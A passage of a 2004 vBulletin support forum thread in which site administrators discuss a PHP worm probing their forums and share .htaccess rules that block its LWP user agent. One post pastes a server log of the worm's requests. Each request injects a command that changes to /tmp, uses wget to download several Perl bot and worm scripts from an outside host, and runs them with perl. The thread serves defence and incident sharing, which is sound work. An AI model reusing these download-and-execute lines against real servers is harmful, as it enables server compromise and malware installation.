Announcement

Collapse
No announcement yet.

showthread attack attempt?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    To view the coding right click the broken image and save it to disk. Rename it giving it .txt extension and then open it in any text editor.
    Admins Zone - Resources for Forum Administrators

    Comment


    • #17
      It is easy to block them. Put the code of the attachment into .htaccess
      Attached Files
      Streicher

      Comment


      • #18
        I'll try that on my site as I now have more then 650 worms trying to exploit my vB haha

        Comment


        • #19
          same happened to mine last night
          server admin have sent me a full logg dont know if it is of any use
          Please talk to vbulletin about the following security hole in their system intruder got in last night thru your site the following way and uploaded files to the temp dir and driving load on server up.
          The vulnerability is in:
          save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?

          The hackers ip is 66.90.67.40, 64.191.63.149 etc


          Code:
          ###########################
          save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET 
          /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          Last edited by Jerry; Sun 26 Dec '04, 9:49am.

          Comment


          • #20
            Your admin doesn't know what he's talking about, its a worm thats trying to attack ALL php script by attempting to pass a long string into ALL variables it can find, the problem is that on google vBulletin is the most popular php link so we're getting more attacks.

            If something actually wrote something to the tmp directory then it wasn't from vBulletin.

            http://securityfocus.com/archive/1/3...2/2004-12-28/0
            Scott MacVicar

            My Blog | Twitter

            Comment


            • #21
              Originally posted by Streicher
              It is easy to block them. Put the code of the attachment into .htaccess
              Thank you, that fixed the problem for me. I don't have the worm/bots browsing the forums anymore.

              meow

              Comment


              • #22
                I've had these unusual bots going through just the archives of the forum and turned them off until I learned more. They all had user agents like lwp-trivial/1.41 or LWP::Simple/5.803

                Here's a typical link they are hitting in the archives:
                http://dionysians.org/forum/archive/...68%5D%29.%2527

                Comment


                • #23
                  So they aren't actually a threat, as vBulletin is secure in this particular manner?

                  I hate having to use HTACCESS for anything much other than disabling directory viewing.

                  Alcar...
                  http://www.oddworldforums.net

                  Comment


                  • #24
                    what's happening is these worms are trying every variable they can find and attempting to exploit them Alcar.

                    the .HTACCESS is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.
                    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                    Comment


                    • #25
                      Just an FYI for those who are blocking by IP, I caught these guys running around my site..


                      67.15.52.18
                      LWP::Simple/5.803
                      69.93.114.234
                      LWP::Simple/5.65
                      81.4.64.206
                      LWP::Simple/5.63
                      66.98.172.100
                      LWP::Simple/5.65
                      66.98.152.87
                      LWP::Simple/5.65
                      69.93.114.234
                      LWP::Simple/5.65
                      ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                      Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                      Comment


                      • #26
                        Can't really be done by IP address since any exploited box will do it.

                        Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:

                        Code:
                        RewriteEngine on
                        RewriteCond %{HTTP_USER_AGENT}  ^LWP* [OR]
                        RewriteCond %{HTTP_USER_AGENT}  ^lwp*
                        RewriteRule  .*      - [F]
                        Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
                        Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpoint

                        Comment


                        • #27
                          Also see http://www.vbulletin.com/forum/showthread.php?t=124244

                          Several of us have been seeing this.

                          Comment


                          • #28
                            Hmmm, so that's why our long standing(year and a half, or thereabouts) Most users ever online was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.

                            Thanks for the info, all.
                            TheologyWeb. We debate theology. srsly.

                            Comment


                            • #29
                              Originally posted by Streicher
                              It is easy to block them. Put the code of the attachment into .htaccess
                              i applied this and the bots are slowly but surely reducing in number.
                              My Football Forum

                              Comment


                              • #30
                                yeah they have all gone now. Thank You very much.
                                My Football Forum

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X